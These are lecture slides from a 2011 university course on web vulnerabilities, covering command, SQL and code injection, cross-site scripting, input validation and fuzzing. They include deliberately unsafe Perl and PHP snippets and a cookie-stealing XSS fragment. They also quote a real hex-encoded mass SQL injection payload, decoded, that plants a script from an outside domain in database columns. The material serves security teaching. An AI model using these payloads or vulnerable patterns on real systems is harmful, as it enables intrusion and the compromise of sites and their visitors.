CIS 433/533 - Computer and Network Security. Web Vulnerabilities, Wrapup

(1)

Computer and Information Science

CIS 433/533 - Computer and

Network Security

Web Vulnerabilities, Wrapup

Professor Kevin Butler

Winter 2011

(2)

Injection Attacks

•

flaws relating to invalid input handling which

then influences program execution

‣

often when passed as a parameter to a helper

program or other utility or subsystem

•

most often occurs in scripting languages

‣

encourage reuse of other programs / modules

(3)

CIS 433/533: Computer and Network Security

Unsafe Perl Script

1 #!/usr/bin/perl

2 # finger.cgi - finger CGI script using Perl5 CGI module

3

4 use CGI;

5 use CGI::Carp qw(fatalsToBrowser);

6 $q = new CGI; # create query object

7

8 # display HTML header

9 print $q->header,

10 $q->start_html('Finger User'),

11 $q->h1('Finger User');

12 print "<pre>";

13

14 # get name of user and display their finger details

15 $user = $q->param("user");

16 print `/usr/bin/finger -sh $user`;

17

18 # display HTML footer

19 print "</pre>";

(4)

Safer Script

14 # get name of user and display their finger details

15 $user = $q->param("user");

16 die "The specified user contains illegal characters!"

17 unless ($user =~ /^\w+$/);

18 print `/usr/bin/finger -sh $user`;

•

counter attack by validating input

‣

compare to pattern that rejects invalid input

(5)

SQL Injection

•

another widely exploited injection attack

•

when input used in SQL query to database

‣

similar to command injection

‣

SQL meta-characters are the concern

‣

must check and validate input for these

$name = $_REQUEST['name'];

$query = “SELECT * FROM suppliers WHERE name = '" . $name . "';"

$result = mysql_query($query);

$name = $_REQUEST['name'];

$query = “SELECT * FROM suppliers WHERE name = '" .

mysql_real_escape_string($name) . "';"

(6)

Consequences

(7)

Real SQL Injection

7

orderitem.asp?IT=GM-204;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045 0043004C00410052004500200040005400200076006100720063006800610072002800320035 00350029002C0040004300200076006100720063006800610072002800320035003500290020 004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F 007200200043005500520053004F005200200046004F0052002000730065006C006500630074 00200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D 0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F 006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D 0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075 002700200061006E0064002000280062002E00780074007900700065003D003900390020006F 007200200062002E00780074007900700065003D003300350020006F007200200062002E0078 0074007900700065003D0032003300310020006F007200200062002E00780074007900700065 003D00310036003700290020004F00500045004E0020005400610062006C0065005F00430075 00720073006F00720020004600450054004300480020004E004500580054002000460052004F 004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054 004F002000400054002C004000430020005700480049004C0045002800400040004600450054 00430048005F005300540041005400550053003D0030002900200042004500470049004E0020 0065007800650063002800270075007000640061007400650020005B0027002B00400054002B 0027005D00200073006500740020005B0027002B00400043002B0027005D003D007200740072 0069006D00280063006F006E007600650072007400280076006100720063006800610072002C 005B0027002B00400043002B0027005D00290029002B00270027003C00730063007200690070 00740020007300720063003D0068007400740070003A002F002F007700770077002E006E00 6900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F00 7300630072006900700074003E0027002700270029004600450054004300480020004E0045 00580054002000460052004F004D00200020005400610062006C0065005F0043007500720073 006F007200200049004E0054004F002000400054002C0040004300200045004E0044002000 43004C004F005300450020005400610062006C0065005F0043007500720073006F0072002000 4400450041004C004C004F00430041005400450020005400610062006C0065005F00430075

(8)

00720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);--•

Decoded result:

•

Redirects to malicious domain where 8 different

browser exploits are launched

DECLARE @T varchar(255)'@C varchar(255) DECLARE

Table_Cursor CURSOR FOR select a.name'b.name from

sysobjects a'syscolumns b where a.id=b.id and

a.xtype='u' and (b.xtype=99 or b.xtype=35 or

b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH

NEXT FROM Table_Cursor INTO @T'@C WHILE

(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set

['+@C+']=rtrim(convert(varchar'['+@C+']))+''<script

src=nihaorr1.com/1.js></script>''')FETCH NEXT FROM

Table_Cursor INTO @T'@C END CLOSE Table_Cursor

(9)

Code Injection

•

further variant

•

input includes code that is then executed

‣

see PHP remote code injection vulnerability

•

variable + global field variables + remote include

‣

this type of attack is widely exploited

<?php

include $path . 'functions.php';

include $path . 'data/prefs.php';

(10)

Cross Site Scripting Attacks

•

attacks where input from one user is later output to

another user

•

XSS commonly seen in scripted web apps

‣

with script code included in output to browser

‣

any supported script, e.g. Javascript, ActiveX

‣

assumed to come from application on site

•

XSS reflection

‣

malicious code supplied to site

(11)

XSS Example

•

guestbooks, wikis, blogs etc

•

where comment includes script code

‣

e.g. to collect cookie details of viewing users

•

need to validate data supplied

‣

including handling various possible encodings

•

attacks both input and output handling

Thanks for this information, its great!

document.cookie</script>

(12)

Validating Input Syntax

•

to ensure input data meets assumptions

‣

e.g. is printable, HTML, email, userid etc

•

compare to what is known acceptable

•

not to known dangerous

‣

as can miss new problems, bypass methods

•

commonly use regular expressions

‣

pattern of characters describe allowable input

‣

details vary between languages

(13)

Input Fuzzing

•

powerful testing method using a large range of

randomly generated inputs

‣

to test whether program/function correctly handles

abnormal inputs

‣

simple, free of assumptions, cheap

‣

assists with reliability as well as security

•

can also use templates to generate classes of

known problem inputs

(14)

Wrapup

(15)

The state of security

•

… issues are in public consciousness

‣

Press coverage is increasing …

‣

Losses mounting … (billions and billions)

‣

Affect increasing …… (ATMs, commerce)

‣

Public is

at risk

....

•

What are we doing?

“…

sound and fury signifying nothing

…”

(well, its not quite that bad)

(16)

The problems …

•

What is the root cause?

‣

Security is not a key goal ...

... and it never has been...

... so, we need to figure out how to

change the way we do engineering

(and science) ...

... to make computers secure.

•

Far too much misunderstanding about basic security

and the use of technology (security theatre)

(17)

The current solutions …

•

Make better software

‣

“we mean it” - B. Gates (2002)

‣

“no really …” - B. Gates (2003)

‣

“Linux/OS X/Sun OS etc. is bad too …” - B. Gates (2005)

‣

“Vista will fix everything” - B. Gates (2006)

‣

“Vista fixes everything” - B. Gates (2007)

‣

“Sorry about Vista ....” - B. Gates (2007.5)

‣

“Windows 7.0 will fix everything” - B. Gates (2008)

•

CERT/SANS-based problem/event tracking

‣

Experts tracking vulnerabilities

‣

Patch system completely broken

•

Destructive research

‣

Back-pressure on product developers

‣

Arms-race with bad guys

•

Problem: reactive, rather than proactive

(18)

The real solutions …

•

Fix the economic incentive equation …

‣

Eventually, MS/Sun/Apple/*** will be in enough pain

that they change the way they make software

•

Education

‣

Things will get better when people understand when

how to use technology

•

Fix engineering practices

‣

Design for security

•

Apply technology

(19)

Your new skills arsenal

•

“A little knowledge is a dangerous thing”

•

More and more, real lives at stake through

subverting computers

•

“With great power comes great

responsibility”

(20)

The bottom line

•

The Web/Internet and new technologies have

limited ability to address security and privacy

concerns …

•

…

computer science is making the world less

safe

!!

•

… it is incumbent on us as scientists to meet these

challenges.

‣

Evangelize importance of security …

‣

Provide sound technologies …

(21)

Computer and Information Science